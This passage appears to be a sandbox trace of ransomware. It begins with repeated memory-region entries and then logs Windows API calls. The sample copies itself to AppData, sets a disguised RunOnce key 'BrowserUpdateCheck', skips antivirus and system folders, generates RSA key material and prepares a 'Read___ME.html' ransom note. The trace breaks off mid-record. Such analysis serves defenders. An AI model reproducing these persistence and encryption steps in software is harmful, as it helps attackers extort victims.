"pagefile_0x0000000000230000" filename = "" Region: id = 643 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 644 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 645 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 646 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 647 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 648 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 649 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 650 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 651 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 652 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 653 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 654 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 655 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 656 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 657 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 658 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 659 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 660 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 661 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 662 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 663 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 664 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 665 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 666 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 667 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 668 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 669 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 670 start_va = 0x3490000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 691 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 692 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 693 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 694 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 695 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 696 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 697 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 698 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 699 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 700 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 701 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 702 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 703 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 704 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 705 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 706 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 707 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 708 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 709 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 710 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 711 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 712 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 713 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Thread: id = 26 os_tid = 0xfe4 [0037.082] _alloca_probe () returned 0x409f25 [0037.087] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2704d8, nSize=0x800 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe")) returned 0x32 [0037.087] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x270ce0, nSize=0x800 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x24 [0037.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x4013e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0037.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x4013e0, cbMultiByte=-1, lpWideCharStr=0x26a090, cchWideChar=6 | out: lpWideCharStr="..doc") returned 6 [0037.087] lstrlenA (lpString="Windows,Microsoft,Microsoft Help,Windows App Certification Kit,Windows Defender,ESET,COMODO,Windows NT,Windows Kits,Windows Mail,Windows Media Player,Windows Multimedia Platform,Windows Phone Kits,Windows Phone Silverlight Kits,Windows Photo Viewer,Windows Portable Devices,Windows Sidebar,WindowsPowerShell,NVIDIA Corporation,Microsoft.NET,Internet Explorer,Kaspersky Lab,McAfee,Avira,spytech software,sysconfig,Avast,Dr.Web,Symantec,Symantec_Client_Security,system volume information,AVG,Microsoft Shared,Common Files,Outlook Express,Movie Maker,Chrome,Mozilla Firefox,Opera,YandexBrowser,ntldr,Wsus,ProgramData") returned 613 [0037.088] lstrlenA (lpString="..doc") returned 5 [0037.088] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x19ef80, nSize=0x800 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0037.088] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0037.088] PathFindFileNameW (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe") returned="vwOrbzLbc.exe" [0037.088] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="vwOrbzLbc.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe" [0037.088] lstrcmpiW (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe", lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe") returned -1 [0037.090] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\vworbzlbc.exe")) returned 0xffffffff [0037.090] CopyFileW (lpExistingFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\vworbzlbc.exe"), bFailIfExists=0) returned 1 [0037.241] _alloca_probe () returned 0x409d4d [0037.241] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", ulOptions=0x0, samDesired=0x20019, phkResult=0x19df60 | out: phkResult=0x19df60*=0x158) returned 0x0 [0037.241] RegQueryValueExW (in: hKey=0x158, lpValueName="BrowserUpdateCheck", lpReserved=0x0, lpType=0x0, lpData=0x19df68, lpcbData=0x19df64*=0x800 | out: lpType=0x0, lpData=0x19df68*=0x0, lpcbData=0x19df64*=0x800) returned 0x2 [0037.241] lstrcmpiW (lpString1="", lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe") returned -1 [0037.241] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x1, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x19df60, lpdwDisposition=0x0 | out: phkResult=0x19df60*=0x17c, lpdwDisposition=0x0) returned 0x0 [0037.241] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe") returned 51 [0037.241] RegSetValueExW (in: hKey=0x17c, lpValueName="BrowserUpdateCheck", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe", cbData=0x66 | out: lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\vwOrbzLbc.exe") returned 0x0 [0037.241] RegCloseKey (hKey=0x17c) returned 0x0 [0037.242] GetEnvironmentVariableW (in: lpName="public", lpBuffer=0x271ea8, nSize=0x800 | out: lpBuffer="C:\\Users\\Public") returned 0xf [0037.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x266b60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0037.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x266b60, cbMultiByte=-1, lpWideCharStr=0x267460, cchWideChar=65 | out: lpWideCharStr="AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7") returned 65 [0037.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x401404, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0037.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x401404, cbMultiByte=-1, lpWideCharStr=0x272a20, cchWideChar=15 | out: lpWideCharStr="Read___ME.html") returned 15 [0037.242] lstrcpyW (in: lpString1=0x40d000, lpString2="Read___ME.html" | out: lpString1="Read___ME.html") returned="Read___ME.html" [0037.242] lstrcpyW (in: lpString1=0x272ab8, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0037.242] PathAddBackslashW (in: pszPath="C:\\Users\\Public" | out: pszPath="C:\\Users\\Public\\") returned="" [0037.242] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7" | out: lpString1="C:\\Users\\Public\\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7") returned="C:\\Users\\Public\\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7" [0037.242] CreateFileW (lpFileName="C:\\Users\\Public\\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7" (normalized: "c:\\users\\public\\ae09c984df6e74640b3271eadb5dd7c65fde806235b2cda478e0efa9129c09e7"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0037.242] GetLastError () returned 0x0 [0037.242] lstrlenA (lpString="rsa_genkey") returned 10 [0037.243] CryptAcquireContextW (in: phProv=0x19e440, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19e440*=0x2638b0) returned 1 [0037.248] CryptGenRandom (in: hProv=0x2638b0, dwLen=0x80, pbBuffer=0x19e458 | out: pbBuffer=0x19e458) returned 1 [0037.248] CryptReleaseContext (hProv=0x2638b0, dwFlags=0x0) returned 1 [0037.394] WriteFile (in: hFile=0x17c, lpBuffer=0x19dd40*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x19e6f8, lpOverlapped=0x0 | out: lpBuffer=0x19dd40*, lpNumberOfBytesWritten=0x19e6f8*=0x102, lpOverlapped=0x0) returned 1 [0037.395] CryptAcquireContextW (in: phProv=0x19da34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19da34*=0x269d10) returned 1 [0037.395] CryptGenRandom (in: hProv=0x269d10, dwLen=0x80, pbBuffer=0x19da4c | out: pbBuffer=0x19da4c) returned 1 [0037.395] CryptReleaseContext (hProv=0x269d10, dwFlags=0x0) returned 1 [0037.395] lstrlenA (lpString="B231B717113902E9F788C7BD0C7ABABAF9B173A7F6B432076B82CBCB7C8149F3CF2F55A8CBDD772BFB4E0A319AE1ED45EB4AA6C4C6BAC6E11014BDD47D3BDDA0DC19B7F217C8A1B33BCAE7681020436907BEC78F0E47AD285D72B8E5466C83114CC40D44A081A604F05E2D147DFC3AEDD9A7B69D493176EFD7D8B0D264D1A2BFB14FECC1378A8D90547A2F6CA070E90F95FCAA54FA26FA5D63DC84C6C3780D4BB41BE4B608343D72DDE52DE40A2A06D56482454F9DF058E65C3F02CBE1B77289F39EC5BDBC58653A35476A205CD7C75A40D34ECFA56DA0A6433E141F0D9AC60DFBAA21E8AEB5658168253A315F298EDBC7850D3D79BB1E15FEF367F5BD27BF8D") returned 512 [0037.396] lstrcpyA (in: lpString1=0x40cbe0, lpString2="7F 9F 5F 94 9C 1C 1E E2 6A 7C F3 B9 BF 65 31 A8\nA7 65 6B DA 39 10 59 B6 10 7F 1B 7E 29 09 35 BD\n10 4C E1 FA D7 2B A3 DA DC A2 6E 8B 63 9F 9C 60\nCE 5E D2 46 3E 8B E1 15 A0 E7 86 13 F0 55 6A DB\nB5 92 FC 98 B2 53 C3 53 2D 42 9D 8F C7 7F 1B 34\n4B DD 90 97 5B B9 FD 35 F0 E1 98 74 D0 2C CB 70\nBF 03 AB 8C 1C BA 72 02 55 0F CE 93 AE 1F FE DD\n7E D6 16 0C 6A C2 A4 B6 EF 19 CA D5 4F 08 68 D5\n4B 35 35 81 17 B7 BD 96 C0 58 F7 28 66 0C CD F0\nD6 9F 96 9C 36 5C D8 7D 9D 56 DF EE 9D B7 56 15\nC2 53 E3 9E 1B B6 81 35 0C 28 2F 9B 7C E1 56 21\n27 7A E3 38 1F 21 08 10 2E 86 F8 BC 0B 17 30 F2\nF5 0E 0A AE B0 15 06 F7 29 3C 7B 8F BA B6 E5 9B\n20 55 DC F7 9C 78 92 C7 F9 07 3C 0A B0 71 C7 50\nC5 64 7C 8C 23 80 37 F7 E2 FF 72 EE E7 1A 01 CF\nA0 CA B0 7A CA 0C FB FF 24 BD 8C C1 77 A8 89 EC\n" | out: lpString1="7F 9F 5F 94 9C 1C 1E E2 6A 7C F3 B9 BF 65 31 A8\nA7 65 6B DA 39 10 59 B6 10 7F 1B 7E 29 09 35 BD\n10 4C E1 FA D7 2B A3 DA DC A2 6E 8B 63 9F 9C 60\nCE 5E D2 46 3E 8B E1 15 A0 E7 86 13 F0 55 6A DB\nB5 92 FC 98 B2 53 C3 53 2D 42 9D 8F C7 7F 1B 34\n4B DD 90 97 5B B9 FD 35 F0 E1 98 74 D0 2C CB 70\nBF 03 AB 8C 1C BA 72 02 55 0F CE 93 AE 1F FE DD\n7E D6 16 0C 6A C2 A4 B6 EF 19 CA D5 4F 08 68 D5\n4B 35 35 81 17 B7 BD 96 C0 58 F7 28 66 0C CD F0\nD6 9F 96 9C 36 5C D8 7D 9D 56 DF EE 9D B7 56 15\nC2 53 E3 9E 1B B6 81 35 0C 28 2F 9B 7C E1 56 21\n27 7A E3 38 1F 21 08 10 2E 86 F8 BC 0B 17 30 F2\nF5 0E 0A AE B0 15 06 F7 29 3C 7B 8F BA B6 E5 9B\n20 55 DC F7 9C 78 92 C7 F9 07 3C 0A B0 71 C7 50\nC5 64 7C 8C 23 80 37 F7 E2 FF 72 EE E7 1A 01 CF\nA0 CA B0 7A CA 0C FB FF 24 BD 8C C1 77 A8 89 EC\n") returned="7F 9F 5F 94 9C 1C 1E E2 6A 7C F3 B9 BF 65 31 A8\nA7 65 6B DA 39 10 59 B6 10 7F 1B 7E 29 09 35 BD\n10 4C E1 FA D7 2B A3 DA DC A2 6E 8B 63 9F 9C 60\nCE 5E D2 46 3E 8B E1 15 A0 E7 86 13 F0 55 6A DB\nB5 92 FC 98 B2 53 C3 53 2D 42 9D 8F C7 7F 1B 34\n4B DD 90 97 5B B9 FD 35 F0 E1 98 74 D0 2C CB 70\nBF 03 AB 8C 1C BA 72 02 55 0F CE 93 AE 1F FE DD\n7E D6 16 0C 6A C2 A4 B6 EF 19 CA D5 4F 08 68 D5\n4B 35 35 81 17 B7 BD 96 C0 58 F7 28 66 0C CD F0\nD6 9F 96 9C 36 5C D8 7D 9D 56 DF EE 9D B7 56 15\nC2 53 E3 9E 1B B6 81 35 0C 28 2F 9B 7C E1 56 21\n27 7A E3 38 1F 21 08 10 2E 86 F8 BC 0B 17 30 F2\nF5 0E 0A AE B0 15 06 F7 29 3C 7B 8F BA B6 E5 9B\n20 55 DC F7 9C 78 92 C7 F9 07 3C 0A B0 71 C7 50\nC5 64 7C 8C 23 80 37 F7 E2 FF 72 EE E7 1A 01 CF\nA0 CA B0 7A CA 0C FB FF 24 BD 8C C1 77 A8 89 EC\n" [0037.396] SetFilePointer (in: hFile=0x17c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x102 [0037.396] WriteFile (in: hFile=0x17c, lpBuffer=0x40cbe0*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x19ef64, lpOverlapped=0x0 | out: lpBuffer=0x40cbe0*, lpNumberOfBytesWritten=0x19ef64*=0x300, lpOverlapped=0x0) returned 1 [0037.443] CloseHandle (hObject=0x17c) returned 1 [0037.444] StrStrA (lpFirst="\r\n\r\n
\r\n \r\n